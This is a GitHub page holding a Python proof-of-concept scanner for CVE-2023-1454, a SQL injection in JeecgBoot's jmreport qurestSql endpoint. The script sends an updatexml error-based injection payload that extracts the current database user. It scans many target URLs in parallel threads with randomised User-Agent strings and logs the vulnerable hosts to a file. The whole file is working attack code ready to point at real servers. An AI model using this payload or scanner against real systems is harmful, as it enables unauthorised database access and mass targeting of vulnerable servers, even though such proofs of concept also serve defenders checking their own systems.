-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-1454.py
110 lines (88 loc) · 3.39 KB
/
CVE-2023-1454.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import logging
import concurrent.futures
import requests
import sys
import urllib3
from argparse import ArgumentParser
from urllib import parse
from time import time
import re
import random
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
OS_TYPE = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
VULN_KEYWORDS = ['success":false', "XPATH", "select"]
PROXIES = {'http': 'http://127.0.0.1:8080',
'https': 'https://127.0.0.1:8080'}
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
FORMATTER = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
SH = logging.StreamHandler()
SH.setLevel(logging.INFO)
SH.setFormatter(FORMATTER)
LOGGER.addHandler(SH)
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(OS_TYPE), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def check_url(url):
url = parse.urlparse(url)
url = '{}://{}'.format(url[0], url[1])
url = "{}/jeecg-boot/jmreport/qurestSql".format(url)
headers = {
'User-Agent': get_ua(),
'Content-Type': 'application/json;charset=UTF-8'
}
data = '''{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}'''
try:
res = requests.post(url, verify=False, allow_redirects=False, headers=headers, data=data, timeout=5)
if res.status_code == 200 and all(keyword in res.text for keyword in VULN_KEYWORDS):
LOGGER.info("[+]{} is Vulnerable!".format(url))
return url
else:
LOGGER.debug("[-]{} has no issue.".format(url))
return None
except requests.exceptions.RequestException as e:
LOGGER.warning("[!]{} request failed: {}".format(url, e))
return None
except Exception as ex:
LOGGER.error("[!]{} Exception occurred: {}".format(url, ex))
return None
def process_results(result):
if result is not None:
with open("vuln.txt", "a+") as f:
f.write(result + "\n")
def multithreading(url_list, threads=5):
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
futures = []
for url in url_list:
futures.append(executor.submit(check_url, url))
for future in concurrent.futures.as_completed(futures):
result = future.result()
process_results(result)
if __name__ == '__main__':
arg = ArgumentParser(description='check_vulnerabilities By J2')
arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
arg.add_argument("-f", "--file", help="Target URL; Example:url.txt")
args = arg.parse_args()
url = args.url
filename = args.file
url_list = []
if url is not None and filename is None:
url_list.append(url)
elif url is None and filename is not None:
with open(filename, "r") as f:
url_list = [i.strip() for i in f.readlines()]
LOGGER.info("[+]任务开始.....")
start = time()
multithreading(url_list)
end = time()
LOGGER.info('任务完成,用时%ds.' % (end - start))